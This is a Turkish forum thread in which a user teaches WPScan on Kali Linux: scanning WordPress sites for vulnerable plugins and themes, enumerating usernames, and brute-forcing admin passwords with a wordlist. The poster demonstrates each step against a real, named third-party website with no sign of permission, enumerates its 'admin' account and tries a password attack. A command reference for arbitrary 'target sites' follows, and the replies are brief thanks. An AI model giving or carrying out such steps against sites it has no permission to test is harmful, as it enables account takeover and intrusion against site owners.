Konuyu Oyla:
  • Toplam: 0 Oy - Ortalama: 0
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Kali Linux Wpscan Kullanımı & Videolu
MECZUP
*
avatar
Binbaşı
Durum: Çevrimdışı
Seviye Puanı: 29
Yaşam Puanı: 715 / 715
Deneyim: 62 / 100
Rep Sayısı: 41
Mesaj Sayısı: 1146
Üyelik Tarihi: 18.12.2017
      
Yorum: #1
Kali Linux Wpscan Kullanımı & Videolu
14.07.2018 13:50
WpScan Nedir?​


Wordpress siteler üzerindeki açıkları tarayar ve kaba kuvvet yöntemi ile site admin giriş bilgilerini alabilmemize yarayan windows'da kullandığımız bruteforce programının linux halidir ancak ondan daha gelişmiştir çünkü açıkları bulabilmemizi sağlar



Nasıl Kullanılır ?​



Öcelikle terminali açarak wpscan --help yazalım arkadaşlar


Karşımıza şu şekilde bi ekran gelecek arkadaşlar .Burdaki parametreler üzerinden anlatım

yapacağım ama hepsini kullanmayacağız tabikide sadece admin giriş bilgilerini bulmaya çalışacağız .

Öncelikle bir site bulalım ben bunu buldum arkadaşlar mailfunnels.com (şifre denemesi yaptım ancak tutmadı ancak mantığı anlarsınız ).


Öncelikle

wpscan --url mailfunnels.com

bu komut ile sitenin tamamı hakkında bilgi alalım .Bu tema ve eklentileri de beraber tarar arkadaşlar.

Sonuç olarak karşımıza şöyle bir ekran gelir.



Burda kırmızı şekilde ünlem olanlar açıklar dır arkadaşlar .


Şimdi kullanıcı usernamesini bulalım .Bunun için şu komutu çalıştıralım


wpscan --url mailfunnels.com --enumerate u



Görüldüğü gibi arkadaşlar;

username : admin


Şimdi masaüstünde bir wordlist oluşturalım içinede tahmini olabilecek şifreleri yazalım ben sadece admin yazdım


wpscan --url mailfunnels.com --wordlist /root/wordlist.txt --username admin


Burda --wordlistten sonraki kısım için masaüstüde oluşturduğunuz txt dosyasını --wordlistten sonraki kısma taşıyalım üstteki gibi olacaktır arkadaşlar sonra devamını yazalım ve ENTER diyelim .



Böyle bir sonuc aldık arkadaşlar .Dediğim gibi şifre tutmadı ama mantık bu şekilde .

Alt tarafta videoda hazır arkadaşlar izlerseniz biraz daha iyi anlarsınız

*

VİDEO

*








Komutlar:

Kod:
wpscan --url www.hedefsite.com // Site ile ilgili version tema eklenti vb. temel bilgileri verir .

wpscan --url www.hedefsite.com --enumerate p //Pluginleri ayrıntılı olarak tarar ve

açıklarını bildirir.

wpscan --url www.hedefsite.com --enumerate t //Temaları ayrıntılı olarak tarar ve

açıklarını bildirir.

wpscan --url www.hedefsite.com --enumerate u //Kullanıcıları arar ve bulduklarını

bildirir bu yolla bruteforce için kullanıcı adı belli olur.

wpscan --url www.hedefsite.com --wordlist /root/wordlist.txt --username admin //Seçilen

kulllanıcı adı üzerine bruteforce saldırısı yapar

Meczup Official

VarsaYoksa Cyberizm
Alinti
Rep Verenler: The_ZiziL
[email protected]
avatar
Kondom Mağduru
Durum: Çevrimdışı
Seviye Puanı: 26
Yaşam Puanı: 234 / 633
Deneyim: 32 / 100
Rep Sayısı: 123
Mesaj Sayısı: 864
Üyelik Tarihi: 05.05.2013
     
Yorum: #2
RE: Kali Linux Wpscan Kullanımı & Videolu
14.07.2018 18:50
Teşekkürler, Emeğine Sağlık Smile kalinin sadece bir anı olarak kalması bende güzel oldu Smile
Alinti
The_ZiziL
*
avatar
Valhalla
Durum: Çevrimiçi
Seviye Puanı: 37
Yaşam Puanı: 903 / 903
Deneyim: 14 / 100
Rep Sayısı: 588
Mesaj Sayısı: 2024
Üyelik Tarihi: 06.02.2017
     
Yorum: #3
RE: Kali Linux Wpscan Kullanımı & Videolu
15.07.2018 11:09
Teşekkürler, Emeğine Sağlık.

Allah’tan utanmayan insanlardan da utanmaz…
Alinti
Dessy
*
avatar
Yarbay
Durum: Çevrimdışı
Seviye Puanı: 23
Yaşam Puanı: 248 / 551
Deneyim: 4 / 100
Rep Sayısı: 120
Mesaj Sayısı: 637
Üyelik Tarihi: 20.11.2015
     
Yorum: #4
RE: Kali Linux Wpscan Kullanımı & Videolu
16.07.2018 16:19
Teşekkürler, emeğine sağlık.

Sosyal Medya: Youtube - İnstagram
Alinti
finndev
*
avatar
Yüzbaşı
Durum: Çevrimdışı
Seviye Puanı: 11
Yaşam Puanı: 25 / 253
Deneyim: 13 / 100
Rep Sayısı: 8
Mesaj Sayısı: 146
Üyelik Tarihi: 28.11.2015
     
Yorum: #5
RE: Kali Linux Wpscan Kullanımı & Videolu
16.07.2018 21:39
Teşekkürler, Emeğine Sağlık Smile
Alinti



1 Ziyaretçi